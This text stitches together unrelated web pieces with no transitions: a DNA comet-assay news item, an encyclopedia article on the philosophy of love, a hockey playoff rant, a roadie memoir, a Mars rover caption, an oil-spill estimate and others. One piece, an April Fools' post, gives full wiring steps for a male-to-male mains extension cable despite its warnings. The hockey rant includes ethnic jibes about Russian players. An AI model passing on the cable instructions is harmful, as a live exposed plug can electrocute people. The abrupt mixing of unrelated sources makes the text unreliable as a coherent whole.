The new technique is “ a major achievement in the development of the comet assay , more than 30 years after its creation , ” says Jean Cadet , a DNA researcher at the Center for Atomic Energy in Grenoble , France , who was not involved in the research .
Cadet says he anticipates that the new test will become widespread , particularly for epidemiological studies .
The technology was designed to be compatible with basic laboratory equipment , so virtually any laboratory can use it .
To demonstrate the potential usefulness of the new system , the researchers evaluated three compounds that have been proposed as potential inhibitors of DNA repair .
Such compounds could be used to boost the effectiveness of chemotherapy agents by preventing cancer cells from repairing the DNA damage caused by chemotherapy .
Their study supported earlier predictions that two of the compounds , known as myricetin and DOPA , appear to halt DNA repair , while a third , called NCA , has little effect .
The MIT team is now working with researchers in Thailand to study the effects of air pollutants on DNA in the cells of people who live in highly polluted regions , compared to inhabitants of cleaner areas .
In a related study , they are teaming up with researchers at Boston University Medical School to compare cells from smokers and nonsmokers .
They also hope to correlate the DNA - repair abilities of individual cells with the genes expressed in those cells .
This work was supported by the MIT Center for Environmental Health Sciences , the National Institute of Environmental Health Sciences ( Program in Gene - Environment Interactions ) , and the National Institutes of Health .
Philosophy of Love
This article examines the nature of love and some of the ethical and political ramifications .
For the philosopher , the question “ what is love ? ” generates a host of issues : love is an abstract noun which means for some it is a word unattached to anything real or sensible , that is all ; for others , it is a means by which our being — our self and its world — are irrevocably affected once we are ‘ touched by love ’ ; some have sought to analyze it , others have preferred to leave it in the realm of the ineffable .
Yet it is undeniable that love plays an enormous and unavoidable role in our several cultures ; we find it discussed in song , film , and novels — humorously or seriously ; it is a constant theme of maturing life and a vibrant theme for youth .
Philosophically , the nature of love has , since the time of the Ancient Greeks , been a mainstay in philosophy , producing theories that range from the materialistic conception of love as purely a physical phenomenon — an animalistic or genetic urge that dictates our behavior — to theories of love as an intensely spiritual affair that in its highest permits us to touch divinity .
Historically , in the Western tradition , Plato ’s Symposium presents the initiating text , for it provides us with an enormously influential and attractive notion that love is characterized by a series of elevations , in which animalistic desire or base lust is superseded by a more intellectual conception of love which also is surpassed by what may be construed by a theological vision of love that transcends sensual attraction and mutuality .
Since then there have been detractors and supporters of Platonic love as well as a host of alternative theories — including that of Plato ’s student , Aristotle and his more secular theory of true love reflecting what he described as ‘ two bodies and one soul . ’
The philosophical treatment of love transcends a variety of sub - disciplines including epistemology , metaphysics , religion , human nature , politics and ethics .
Often statements or arguments concerning love , its nature and role in human life for example connect to one or all the central theories of philosophy , and is often compared with , or examined in the context of , the philosophies of sex and gender as well as body and intentionality .
The task of a philosophy of love is to present the appropriate issues in a cogent manner , drawing on relevant theories of human nature , desire , ethics , and so on .
Table of Contents
1. The Nature of Love : Eros , Philia , and Agape
The philosophical discussion regarding love logically begins with questions concerning its nature .
This implies that love has a “ nature , ” a proposition that some may oppose arguing that love is conceptually irrational , in the sense that it cannot be described in rational or meaningful propositions .
For such critics , who are presenting a metaphysical and epistemological argument , love may be an ejection of emotions that defy rational examination ; on the other hand , some languages , such as Papuan , do not even admit the concept , which negates the possibility of a philosophical examination .
In English , the word “ love , ” which is derived from Germanic forms of the Sanskrit lubh ( desire ) , is broadly defined and hence imprecise , which generates first order problems of definition and meaning , which are resolved to some extent by the reference to the Greek terms , eros , philia , and agape .
a. Eros
The term eros ( Greek erasthai ) is used to refer to that part of love constituting a passionate , intense desire for something ; it is often referred to as a sexual desire , hence the modern notion of “ erotic ” ( Greek erotikos ) .
In Plato ‘s writings however , eros is held to be a common desire that seeks transcendental beauty - the particular beauty of an individual reminds us of true beauty that exists in the world of Forms or Ideas ( Phaedrus 249E : “ he who loves the beautiful is called a lover because he partakes of it . ” Trans. Jowett ) .
The Platonic - Socratic position maintains that the love we generate for beauty on this earth can never be truly satisfied until we die ; but in the meantime we should aspire beyond the particular stimulating image in front of us to the contemplation of beauty in itself .
The implication of the Platonic theory of eros is that ideal beauty , which is reflected in the particular images of beauty we find , becomes interchangeable across people and things , ideas , and art : to love is to love the Platonic form of beauty - not a particular individual , but the element they posses of true ( Ideal ) beauty .
Reciprocity is not necessary to Plato ’s view of love , for the desire is for the object ( of Beauty ) , than for , say , the company of another and shared values and pursuits .
Many in the Platonic vein of philosophy hold that love is an intrinsically higher value than appetitive or physical desire .
Physical desire , they note , is held in common with the animal kingdom .
Hence , it is of a lower order of reaction and stimulus than a rationally induced love — that is , a love produced by rational discourse and exploration of ideas , which in turn defines the pursuit of Ideal beauty .
Accordingly , the physical love of an object , an idea , or a person in itself is not a proper form of love , love being a reflection of that part of the object , idea , or person , that partakes in Ideal beauty .
b. Philia
In contrast to the desiring and passionate yearning of eros , philia entails a fondness and appreciation of the other .
For the Greeks , the term philia incorporated not just friendship , but also loyalties to family and polis - one ’s political community , job , or discipline .
Philia for another may be motivated , as Aristotle explains in the Nicomachean Ethics , Book VIII , for the agent ’s sake or for the other ’s own sake .
The motivational distinctions are derived from love for another because the friendship is wholly useful as in the case of business contacts , or because their character and values are pleasing ( with the implication that if those attractive habits change , so too does the friendship ) , or for the other in who they are in themselves , regardless of one ’s interests in the matter .
The English concept of friendship roughly captures Aristotle ’s notion of philia , as he writes : “ things that cause friendship are : doing kindnesses ; doing them unasked ; and not proclaiming the fact when they are done ” ( Rhetoric , II .
4 , trans .
Rhys Roberts ) .
Aristotle elaborates on the kinds of things we seek in proper friendship , suggesting that the proper basis for philia is objective : those who share our dispositions , who bear no grudges , who seek what we do , who are temperate , and just , who admire us appropriately as we admire them , and so on .
Philia could not emanate from those who are quarrelsome , gossips , aggressive in manner and personality , who are unjust , and so on .
The best characters , it follows , may produce the best kind of friendship and hence love : indeed , how to be a good character worthy of philia is the theme of the Nicomachaen Ethics .
The most rational man is he who would be the happiest , and he , therefore , who is capable of the best form of friendship , which between two “ who are good , and alike in virtue ” is rare ( NE , VIII.4 trans .
Ross ) .
We can surmise that love between such equals - Aristotle ’s rational and happy men-would be perfect , with circles of diminishing quality for those who are morally removed from the best .
He characterizes such love as “ a sort of excess of feeling ” .
( NE , VIII.6 )
Friendships of a lesser quality may also be based on the pleasure or utility that is derived from another ’s company .
A business friendship is based on utility–on mutual reciprocity of similar business interests ; once the business is at an end , then the friendship dissolves .
This is similar to those friendships based on the pleasure that is derived from the other ’s company , which is not a pleasure enjoyed for whom the other person is in himself , but in the flow of pleasure from his actions or humour .
The first condition for the highest form of Aristotelian love is that a man loves himself .
Without an egoistic basis , he cannot extend sympathy and affection to others ( NE , IX.8 ) .
Such self - love is not hedonistic , or glorified , depending on the pursuit of immediate pleasures or the adulation of the crowd , it is instead a reflection of his pursuit of the noble and virtuous , which culminate in the pursuit of the reflective life .
Friendship with others is required “ since his purpose is to contemplate worthy actions … to live pleasantly … sharing in discussion and thought ” as is appropriate for the virtuous man and his friend ( NE , IX.9 ) .
The morally virtuous man deserves in turn the love of those below him ; he is not obliged to give an equal love in return , which implies that the Aristotelian concept of love is elitist or perfectionist :
“ In all friendships implying inequality the love also should be proportional , i.e. the better should be more loved than he loves . ” ( NE , VIII , 7 , ) .
Reciprocity , although not necessarily equal , is a condition of Aristotelian love and friendship , although parental love can involve a one - sided fondness .
c. Agape
Agape refers to the paternal love of God for man and of man for God but is extended to include a brotherly love for all humanity .
( The Hebrew ahev has a slightly wider semantic range than agape ) .
Agape arguably draws on elements from both eros and philia in that it seeks a perfect kind of love that is at once a fondness , a transcending of the particular , and a passion without the necessity of reciprocity .
The concept is expanded on in the Judaic - Christian tradition of loving God : “ You shall love the Lord your God with all your heart , and with all your soul , and with all your might ” ( Deuteronomy 6:5 ) and loving “ thy neighbour as thyself ” ( Leviticus 19:18 ) .
The love of God requires absolute devotion that is reminiscent of Plato ’s love of Beauty ( and Christian translators of Plato such as St. Augustine employed the connections ) , which involves an erotic passion , awe , and desire that transcends earthly cares and obstacles .
Aquinas , on the other hand , picked up on the Aristotelian theories of friendship and love to proclaim God as the most rational being and hence the most deserving of one ’s love , respect , and considerations .
The universalist command to “ love thy neighbor as thyself ” refers the subject to those surrounding him , whom he should love unilaterally if necessary .
The command employs the logic of mutual reciprocity , and hints at an Aristotelian basis that the subject should love himself in some appropriate manner : for awkward results would ensue if he loved himself in a particularly inappropriate , perverted manner !
Philosophers can debate the nature of “ self - love ” implied in this — from the Aristotelian notion that self - love is necessary for any kind of interpersonal love , to the condemnation of egoism and the impoverished examples that pride and self - glorification from which to base one ’s love of another .
St. Augustine relinquishes the debate — he claims that no command is needed for a man to love himself ( De bono viduitatis , xxi ) .
Analogous to the logic of “ it is better to give than to receive ” , the universalism of agape requires an initial invocation from someone : in a reversal of the Aristotelian position , the onus for the Christian is on the morally superior to extend love to others .
Nonetheless , the command also entails an egalitarian love - hence the Christian code to “ love thy enemies ” ( Matthew 5:44 - 45 ) .
Such love transcends any perfectionist or aristocratic notions that some are ( or should be ) more loveable than others .
Agape finds echoes in the ethics of Kant and Kierkegaard , who assert the moral importance of giving impartial respect or love to another person qua human being in the abstract .
However , loving one ’s neighbor impartially ( James 2:9 ) invokes serious ethical concerns , especially if the neighbor ostensibly does not warrant love .
Debate thus begins on what elements of a neighbor ’s conduct should be included in agape , and which should be excluded .
Early Christians asked whether the principle applied only to disciples of Christ or to all .
The impartialists won the debate asserting that the neighbor ’s humanity provides the primary condition of being loved ; nonetheless his actions may require a second order of criticisms , for the logic of brotherly love implies that it is a moral improvement on brotherly hate .
For metaphysical dualists , loving the soul rather than the neighbor ’s body or deeds provides a useful escape clause - or in turn the justification for penalizing the other ’s body for sin and moral transgressions , while releasing the proper object of love - the soul - from its secular torments .
For Christian pacifists , “ turning the other cheek ” to aggression and violence implies a hope that the aggressor will eventually learn to comprehend the higher values of peace , forgiveness , and a love for humanity .
The universalism of agape runs counter to the partialism of Aristotle and poses a variety of ethical implications .
Aquinas admits a partialism in love towards those to whom we are related while maintaining that we should be charitable to all , whereas others such as Kierkegaard insist on impartiality .
Recently , Hugh LaFallotte ( 1991 ) has noted that to love those one is partial towards is not necessarily a negation of the impartiality principle , for impartialism could admit loving those closer to one as an impartial principle , and , employing Aristotle ’s conception of self - love , iterates that loving others requires an intimacy that can only be gained from being partially intimate .
Others would claim that the concept of universal love , of loving all equally , is not only impracticable , but logically empty - Aristotle , for example , argues : “ One can not be a friend to many people in the sense of having friendship of the perfect type with them , just as one cannot be in love with many people at once ( for love is a sort of excess of feeling , and it is the nature of such only to be felt towards one person ) ” ( NE , VIII.6 ) .
2. The Nature of Love : Further Conceptual Considerations
Presuming love has a nature , it should be , to some extent at least , describable within the concepts of language .
But what is meant by an appropriate language of description may be as philosophically beguiling as love itself .
Such considerations invoke the philosophy of language , of the relevance and appropriateness of meanings , but they also provide the analysis of “ love ” with its first principles .
Does it exist and if so , is it knowable , comprehensible , and describable ?
Love may be knowable and comprehensible to others , as understood in the phrases , “ I am in love ” , “ I love you ” , but what “ love ” means in these sentences may not be analyzed further : that is , the concept “ love ” is irreducible - an axiomatic , or self - evident , state of affairs that warrants no further intellectual intrusion , an apodictic category perhaps , that a Kantian may recognize .
The epistemology of love asks how we may know love , how we may understand it , whether it is possible or plausible to make statements about others or ourselves being in love ( which touches on the philosophical issue of private knowledge versus public behavior ) .
Again , the epistemology of love is intimately connected to the philosophy of language and theories of the emotions .
If love is purely an emotional condition , it is plausible to argue that it remains a private phenomenon incapable of being accessed by others , except through an expression of language , and language may be a poor indicator of an emotional state both for the listener and the subject .
Emotivists would hold that a statement such as “ I am in love ” is irreducible to other statements because it is a nonpropositional utterance , hence its veracity is beyond examination .
Phenomenologists may similarly present love as a non-cognitive phenomenon .
Scheler , for example , toys with Plato ’s Ideal love , which is cognitive , claiming : “ love itself … brings about the continuous emergence of ever - higher value in the object–just as if it were streaming out from the object of its own accord , without any exertion ( even of wishing ) on the part of the lover ” ( 1954 , p. 57 ) .
The lover is passive before the beloved .
The claim that “ love ” can not be examined is different from that claiming “ love ” should not be subject to examination - that it should be put or left beyond the mind ’s reach , out of a dutiful respect for its mysteriousness , its awesome , divine , or romantic nature .
But if it is agreed that there is such a thing as “ love ” conceptually speaking , when people present statements concerning love , or admonitions such as “ she should show more love , ” then a philosophical examination seems appropriate : is it synonymous with certain patterns of behavior , of inflections in the voice or manner , or by the apparent pursuit and protection of a particular value ( “ Look at how he dotes upon his flowers - he must love them ” ) ?
If love does possesses “ a nature ” which is identifiable by some means - a personal expression , a discernible pattern of behavior , or other activity , it can still be asked whether that nature can be properly understood by humanity .
Love may have a nature , yet we may not possess the proper intellectual capacity to understand it - accordingly , we may gain glimpses perhaps of its essence - as Socrates argues in The Symposium , but its true nature being forever beyond humanity ’s intellectual grasp .
Accordingly , love may be partially described , or hinted at , in a dialectic or analytical exposition of the concept but never understood in itself .
Love may therefore become an epiphenomenal entity , generated by human action in loving , but never grasped by the mind or language .
Love may be so described as a Platonic Form , belonging to the higher realm of transcendental concepts that mortals can barely conceive of in their purity , catching only glimpses of the Forms ’ conceptual shadows that logic and reason unveil or disclose .
Another view , again derived from Platonic philosophy , may permit love to be understood by certain people and not others .
This invokes a hierarchical epistemology , that only the initiated , the experienced , the philosophical , or the poetical or musical , may gain insights into its nature .
On one level this admits that only the experienced can know its nature , which is putatively true of any experience , but it also may imply a social division of understanding - that only philosopher kings may know true love .
On the first implication , those who do not feel or experience love are incapable ( unless initiated through rite , dialectical philosophy , artistic processes , and so on ) of comprehending its nature , whereas the second implication suggests ( though this is not a logically necessary inference ) that the non-initiated , or those incapable of understanding , feel only physical desire and not “ love . ”
Accordingly , “ love ” belongs either to the higher faculties of all , understanding of which requires being educated in some manner or form , or it belongs to the higher echelons of society - to a priestly , philosophical , or artistic , poetic class .
The uninitiated , the incapable , or the young and inexperienced - those who are not romantic troubadours - are doomed only to feel physical desire .
This separating of love from physical desire has further implications concerning the nature of romantic love .
3. The Nature of Love : Romantic Love
Romantic love is deemed to be of a higher metaphysical and ethical status than sexual or physical attractiveness alone .
The idea of romantic love initially stems from the Platonic tradition that love is a desire for beauty - a value that transcends the particularities of the physical body .
For Plato , the love of beauty culminates in the love of philosophy , the subject that pursues the highest capacity of thinking .
The romantic love of knights and damsels emerged in the early medieval ages ( 11th Century France , fine amour ) a philosophical echo of both Platonic and Aristotelian love and literally a derivative of the Roman poet , Ovid and his Ars Amatoria .
Romantic love theoretically was not to be consummated , for such love was transcendentally motivated by a deep respect for the lady ; however , it was to be actively pursued in chivalric deeds rather than contemplated - which is in contrast to Ovid ’s persistent sensual pursuit of conquests !
Modern romantic love returns to Aristotle ’s version of the special love two people find in each other ’s virtues - one soul and two bodies , as he poetically puts it .
It is deemed to be of a higher status , ethically , aesthetically , and even metaphysically than the love that behaviorists or physicalists describe .
4. The Nature of Love : Physical , Emotional , Spiritual
Some may hold that love is physical , i.e. , that love is nothing but a physical response to another whom the agent feels physically attracted to .
Accordingly , the action of loving encompasses a broad range of behavior including caring , listening , attending to , preferring to others , and so on .
( This would be proposed by behaviorists ) .
Others ( physicalists , geneticists ) reduce all examinations of love to the physical motivation of the sexual impulse - the simple sexual instinct that is shared with all complex living entities , which may , in humans , be directed consciously , sub - consciously or pre-rationally toward a potential mate or object of sexual gratification .
Physical determinists , those who believe the world to entirely physical and that every event has a prior ( physical cause ) , consider love to be an extension of the chemical - biological constituents of the human creature and be explicable according to such processes .
In this vein , geneticists may invoke the theory that the genes ( an individual ’s DNA ) form the determining criteria in any sexual or putative romantic choice , especially in choosing a mate .
However , a problem for those who claim that love is reducible to the physical attractiveness of a potential mate , or to the blood ties of family and kin which forge bonds of filial love , is that it does not capture the affections between those who cannot or wish not to reproduce - that is , physicalism or determinism ignores the possibility of romantic , ideational love — it may explain eros , but not philia or agape .
Behaviorism , which stems from the theory of the mind and asserts a rejection of Cartesian dualism between mind and body , entails that love is a series of actions and preferences which is thereby observable to oneself and others .
The behaviorist theory that love is observable ( according to the recognizable behavioral constraints corresponding to acts of love ) suggests also that it is theoretically quantifiable : that A acts in a certain way ( actions X , Y , Z ) around B , more so than he does around C , suggests that he “ loves ” B more than C .
The problem with the behaviorist vision of love is that it is susceptible to the poignant criticism that a person ’s actions need not express their inner state or emotions —
A may be a very good actor .
Radical behaviorists , such as B. F. Skinner , claim that observable and unobservable behavior such as mental states can be examined from the behaviorist framework , in terms of the laws of conditioning .
On this view , that one falls in love may go unrecognised by the casual observer , but the act of being in love can be examined by what events or conditions led to the agent ’s believing she was in love : this may include the theory that being in love is an overtly strong reaction to a set of highly positive conditions in the behavior or presence of another .
Expressionist love is similar to behaviorism in that love is considered an expression of a state of affairs towards a beloved , which may be communicated through language ( words , poetry , music ) or behavior ( bringing flowers , giving up a kidney , diving into the proverbial burning building ) , but which is a reflection of an internal , emotional state , rather than an exhibition of physical responses to stimuli .
Others in this vein may claim love to be a spiritual response , the recognition of a soul that completes one ’s own soul , or complements or augments it .
The spiritualist vision of love incorporates mystical as well as traditional romantic notions of love , but rejects the behaviorist or physicalist explanations .
Those who consider love to be an aesthetic response would hold that love is knowable through the emotional and conscious feeling it provokes yet which cannot perhaps be captured in rational or descriptive language : it is instead to be captured , as far as that is possible , by metaphor or by music .
5. Love : Ethics and Politics
The ethical aspects in love involve the moral appropriateness of loving , and the forms it should or should not take .
The subject area raises such questions as : is it ethically acceptable to love an object , or to love oneself ?
Is love to oneself or to another a duty ?
Should the ethically minded person aim to love all people equally ?
Is partial love morally acceptable or permissible ( that is , not right , but excusable ) ?
Should love only involve those with whom the agent can have a meaningful relationship ?
Should love aim to transcend sexual desire or physical appearances ?
May notions of romantic , sexual love apply to same sex couples ?
Some of the subject area naturally spills into the ethics of sex , which deals with the appropriateness of sexual activity , reproduction , hetero and homosexual activity , and so on .
In the area of political philosophy , love can be studied from a variety of perspectives .
For example , some may see love as an instantiation of social dominance by one group ( males ) over another ( females ) , in which the socially constructed language and etiquette of love is designed to empower men and disempower women .
On this theory , love is a product of patriarchy , and acts analogously to Karl Marx ’s view of religion ( the opiate of the people ) that love is the opiate of women .
The implication is that were they to shrug off the language and notions of “ love , ” “ being in love , ” “ loving someone , ” and so on , they would be empowered .
The theory is often attractive to feminists and Marxists , who view social relations ( and the entire panoply of culture , language , politics , institutions ) as reflecting deeper social structures that divide people into classes , sexes , and races .
This article has touched on some of the main elements of the philosophy of love .
It reaches into many philosophical fields , notably theories of human nature , the self , and of the mind .
The language of love , as it is found in other languages as well as in English , is similarly broad and deserves more attention .
6. References and Further Reading
Aristotle Nicomachean Ethics .
Aristotle Rhetoric .
Rhys Roberts ( trans . ) .
Augustine
De bono viduitatis .
LaFallotte , Hugh ( 1991 ) .
“ Personal Relations . ” Peter Singer ( ed. ) A Companion to Ethics .
Blackwell , pp. 327-32 .
Plato Phaedrus .
Plato Symposium .
Scheler , Max ( 1954 ) .
The Nature of Sympathy .
Peter Heath ( trans . ) .
New Haven : Yale University Press .
Author Information
Alexander Moseley
Email : alexandermoseley@icloud.com
United Kingdom
Update : This How - To was written for April Fools ’ Day .
It is not advised you attempt to make or even use this cable .
The comments have made it very clear how dangerous to you and others using this cable can be .
The image above is not of a full male - to - male cable , only the ground is connected , and the generator is not running .
We all know Ethernet has the crossover cable , cars have jumper cables , and RS232 has the null modem .
Well , it is about time our wall sockets get their own crossover cable .
This crossover cable is great for running power to a circuit disconnected from power .
Maybe you are out of fuses , the breaker is broken or you just do n’t want to go check the fuse box when there is a murderer about .
This cable makes a great gift for even the most loathsome of acquaintances .
This an April Fools ’ Day post .
You should not do this !!!
Warning : These are Mains voltages and currents we are working with .
If you do not know why you should not attempt this , you should not attempt this .
You will need :
1 Extension cord .
1 Male extension cord repair connector .
Tools to strip the extension cord , and attach the connector : Knife , wire strippers , and screwdriver .
Respect for mains voltages and currents .
If your extension cord has warning labels , read them .
Cut the extension cord to the desired length .
Strip about one inch ( 2.5 cm ) of the outer insulation from the part of the cord that has the male plug .
Strip about 3/8 inch ( 1 cm ) of each of the conductors .
If there is a strip gauge , use it for a guide instead .
Twist each of the stranded conductors to prevent fraying and possible shorts later .
Slide the shroud over the cord .
Screw the conductors into each of their respective terminals on the connector .
The Green or bare conductor goes to the ground conductor terminal .
It often has a green screw .
The White conductor goes to the grounded conductor terminal .
It often has a silver - colored screw .
The Black conductor goes to the ungrounded conductor terminal .
It often has a gold - colored screw .
Use a multimeter to check continuity and make sure there are no shorts .
Slide the shroud up to the connector and fasten the two parts together .
Secure the cable clamp .
There you have it , a finished Mains crossover cable .
There you have it , a Mains crossover cable .
How might you use this crossover cable ?
Sonic Router x Official.fm // SR Mix Archive
http://sonicrouter.official.fm/
Sonic Router x Bleep.com Podcast
1st week of the month @ Bleep.com // Subscribe
Sonic Router x the Quietus.com
Monthly opinion columns ONLY at The Quietus
Sonic Router x Hivemind.fm
Every 2nd & 4th Sunday // 10 pm - 12 am @ Hivemind.fm
Sonic Router x Mixcloud // Hivemind.fm Show Archive
Hosted for streaming on Mixcloud.com
Sonic Router x Trap Magazine
Bi-monthly features and more .
Sonic Router x URB.com : Suburban Sine Wave Surfing
Yours to read ONLY at URB.com
Sonic Router x Radio Magnetic
Classic shows available on demand on Radio Magnetic
Pink Floyd demanded a certain quality of sound .
They wanted their amps stacked high , not just on stage , where they were so broad and tall and forbidding that they looked like a barricade in the Paris Commune .
They also wanted amp clusters at three highly elevated points around the stadium , and I spent the morning lugging huge blocks of wood and circuitry up and up and up the stairs of the decayed old bowl .
There was one other assignment : a parachute - like white silken canopy roof that Pink Floyd required over the stage .
It took about six hours to get the thing up and in position .
We were told that this was the first use of the canopy and Pink ’s guys were unsteady .
They had some blueprints , but those turned out not to be of much use .
Eventually the roof did rise and inflate , with American know - how applied .
Such know - how involved a lot of spontaneous knot - tying and strategic rope tangling .
Pink Floyd went on at about 10 that night and the amp clusters that we ’d expended all that servile sweat to build did n’t work  people had sat on them , kicked them or cut the cords .
So Pink made its noise , the towers stayed mute , the mob flicked on lighters at the end and then we spent three hours breaking the amps down and loading the truck .
We refused to go after the speakers all the way up the stadium steps and , after some sharp words , Pink ’s guys had to scramble up and retrieve them .
There was , for the record , almost always tension between the roadies and the stage crew .
One time , at a show by ( if memory serves ) Queen , their five roadies got into a brawl with a dozen of our stage crew guys ; then the house security , mostly Jersey bikers and black - belt karate devotees , heard the noise and jumped in .
The roadies held on for a while , but finally they saw it was a lost cause .
One of them grabbed a case of champagne from the truck cab and opened a bottle and passed it around  all became drunk and happy .
Pink ’s road manager wanted the inflatable canopy brought down gently , then folded and packed securely in its wooden boxes .
The problem was that the thing was full of helium and no one knew where the release valve was ; we ’d also secured it to the stage with so many knots of such foolish intricacy that their disentanglement would have given a gang of sailors pause .
Everyone was tired .
Those once intoxicated were no longer .
It was 4 a.m. and time to go home .
Did the Penguins seriously fail to recognize that Mike Cammalleri was the one player that could consistently burn them ?
Montreal eliminated both Crosby and Malkin all series , why did n’t the Pens play Cammalleri in the same manner ?
How did the Penguins ( and the Capitals as well ) manage to make Hal Gill look like a number one defenceman ?
I watched him play in Toronto and he was certainly better than I ever thought he would be and he was able to play a shut - down role sporadically , but these playoffs he has turned into Chris Pronger .
How ?
Who is a more unlikeable player , Dan Carcillo or Maxim Lapierre ?
Why did n’t the Penguins consistently dump the puck into Marc - Andre Bergeron ’s corner and hit him relentlessly ?
Bergeron is a marginal defenceman under optimal conditions , how bad would he be under constant duress ?
Is Brian Gionta legally classified as a dwarf or is he simply an oversized midget ?
Is the fact that P.K. Subban became Montreal ’s best defenceman after Markov ’s injury more indicative of his tremendous skill or how bad the rest of the Montreal defence really are ?
Montreal fans can’t even pretend that they ’ve enjoyed the work of Roman Hamrlik this year .
Are Hab fans going to thank the Leafs for turning Dominic Moore into a third line superstar ?
He ’s scored a few big goals .
Sure the second round pick the Leafs received a few year ago was nice , but they should never have put that waiver claim in on him if this is how it all turned out .
How many chins does Jaroslav Spacek have ?
Why did n’t Dan Bylsma put the hit out on Jaroslav Halak ?
Just play Relax by Frankie Goes to Hollywood to hypnotize Tyler Kennedy and show him videos of Nick Kypreos - Grant Fuhr on loop .
Get the audio guys to play it and the rest will take care of itself .
“ I swear I did n’t tell him to run Jaro ! ”
Does Gary Bettman not know how to fix a game ?
What was Marc - Andre Fleury doing before and after each game ?
He was awful .
Either the Montreal party scene engulfed him or his family has mob ties and they squeezed into throwing the series .
Did I mention he was awful ?
Did Sergei Gonchar do irreparable damage to Russian defencemen everywhere with his laughably poor attempt to stop Montreal 's short - handed goal ?
I was furious and claimed that ’s what they get for putting a Russian on defence .
And two of my favourite Leaf defencemen were both Russian ( Dmitri Yushkevich and Dany Markov ) .
That play will confirm a lot of stereotypes .
Little Dmitry Rushenko better stick with forward because he ’ll never get a chance to play defence in the NHL .
That brings up the question whether any Russian actually grows up wanting to play any sort of defence .
I 'm lashing out here !
Are the Canadiens only able to bring it against teams far superior to them and will they have troubles solving the horribleness of the Bruins or Flyers ?
Is anyone going to demand Jaroslav Halak take a drug test ?
I want to see that urine .
No way it ’s clean .
Now that the Habs are advancing to the conference finals what are the odds that Don Cherry learns how to properly pronounce Jacques Martin 's name ?
Will he insist upon calling him Jack Martin ?
Are the Habs going to ride this wild momentum right to a Stanley Cup championship ?
I ’d wager a lot on Chicago and even San Jose beating them , but anything can happen in a seven game series , so I ’d be worried , especially since I was 100 % sure both Washington and Pittsburgh would beat the Canadiens handily .
How long will Montreal fans completely forget about Scott Gomez ’s contract ?
Does being a part of this magical team give him a one year respite ?
He was n’t bad this year by any means , but he was n’t anywhere near $ 7.35 million good and that sort of thing does n’t go over well in Montreal .
This contract is going to be an anchor for the Habs , especially now that Plekanec becomes a UFA after the season and soon - to - be RFA playoff hero Halak will wear a mask to rob them blind .
Is this going to give new life to the stupid argument that Sidney Crosby can’t bring it in big games ( like nobody watched the Olympics ) ?
Are the Montreal Canadiens seriously a team of destiny ?
Will I be able to get through these playoffs with my sanity ?
Go Hawks Go !
I started writing this last night when Montreal was winning 4 - 0 .
Very soon after I began the Penguins made it 4 - 2 .
I thought they were coming back .
Maybe if I kept writing under the theory that the Habs had the game wrapped up they would blow it in horrible fashion thanks to my reverse jinx .
Or maybe saying I was reverse jinxing them on twitter actually reverse jinxed my reverse jinx .
Montreal winning is making me insane .
I need to be committed .
I really do n’t know how Montreal did it .
First Washington , now Pittsburgh .
What happened ?
I have some questions that need to be answered .
Also , when you die and wake up in the hospital , you keep all your money .
Free healthcare FTW !
The house features wooden fans , push - button light switches , chandeliers that look like crowns and toilets that were made in 1912 .
In the corner of the basement is a mysterious little room with five - foot ceilings and exposed brick walls .
Digging around that room one day , Drew Brees uncovered a metal sign from a historic tavern .
Oddly enough , Brees has one of the most modern houses on the block .
Neighbors live in Victorian mansions with white columns , covered by a canopy of oak trees .
A few steps away are city hallmarks — a park , a church , a university and a liquor store .
When the St. Charles Avenue streetcar line is repaired , Brees will be able to hear the trolleys from his front yard .
“ This is what I think of when I think of New Orleans , ” Brittany Brees said .
“ In San Diego , we had a really easy life .
But the easy life is n’t always the best life . ”
So she waits in long lines at the cable company , calls movers to see why they are late and rips out palm trees in the yard because they remind her of California .
In a way , Brittany and Drew Brees are like any other young couple without children starting over in New Orleans .
And yet , a six - year , $ 60 million contract with the Saints sets them apart .
In an effort to blend in , they have taken one of the ghost tours in the French Quarter , shopped for antiques on Magazine Street and eaten at almost every notable restaurant in New Orleans , which is quite a list .
After inhaling a few too many beignets , Brittany Brees tried plugging in her treadmill .
There was just one problem .
The outlet in the house would not take a modern plug .
“ I ’ve already gained 10 pounds since we got here , ” she said .
She walks the neighborhood , marveling at the purple and pink paint jobs on the houses , thinking about how she and her husband can make their mark on New Orleans .
The main priority is for Brees to lead the Saints to the playoffs .
But restoring a colorful old house is another way to help preserve the city .
While humans ' lives unfolded on Earth , NASA 's Mars Exploration Rover Opportunity paused in its southward trek and captured this photomosaic around 15:00 local Mars time on May 2 , 2010 .
The timing for this photography with Opportunity 's panoramic camera ( Pancam ) was coordinated with a " moment in time " simultaneous photographic event in thousands of locations on Earth , organized through New York Times photography blog , Lens .
( See http://lens.blogs.nytimes.com/2010/05/04/readers-14/.)
Dusty , reddish brown dunes stretch southward to the horizon along the rover 's route ahead .
The " Two Worlds , One Sun " theme is a reference to the motto inscribed on the Pancam calibration target , seen on the back of the rover deck at the bottom of this view .
The target is used to properly calibrate and color - balance the Pancam images , and with its artistically styled shadow post , or gnomon , it doubles as a sundial ( also known as a " Marsdial " ) for educational purposes .
( See PIA05018 . )
This scene is a three - tall by one - wide mosaic of Pancam images taken through the camera 's red ( 602 nanometer ) , green ( 530 nanometer ) and blue ( 480 nanometer ) filters .
It has been calibrated and processed to approximate the colors that would be seen by humans if they could be present for this lovely Martian view .
The camera took the images during the 2,229th Martian day , or sol , of Opportunity 's mission on Mars .
BB10 K 2021
Oh yes you can .
Oh yes WE will .
Figure 1 . US Coast Guard map showing size and appearance of oil slick on April 28 , 2010 .
Dr. Ian MacDonald at FSU just produced a new spill - size estimate based on the US Coast Guard aerial overflight map of the oil slick on April 28 , 2010 .
This map shows the slick covering 1,786 square miles ( 4,627 square kilometers ) .
The bottom line : on April 28 there was a total of 8.9 million gallons floating on the surface of the Gulf .
That suggests a minimum average flow rate of slightly more than 1.1 million gallons of oil ( 26,500 barrels ) per day from the leaking well on the seafloor .
Since we ’re now in Day 11 of the spill , which began with a blowout and explosion on April 20 , we estimate that by the end of the today 12.2 million gallons of oil , at a minimum , have been spilled into the Gulf of Mexico .
The oft - quoted official estimate for the Exxon Valdez spill is 11 million gallons , although some think that is the lower limit of the likely range .
It appears that we ’ve just set a very sad new record .
Read here .
Well .... the scientists did n't really use the term ' crap ' but the terminology ' beaver - pond deposits ' sounds awful suspicious , no ?
Anyways , beavers habitat is adversely affected by drought conditions , which occurred in Yellowstone during both the Roman and Medieval warmings .
It became so dry during these warming periods that beaver activity in Yellowstone was severely diminished .
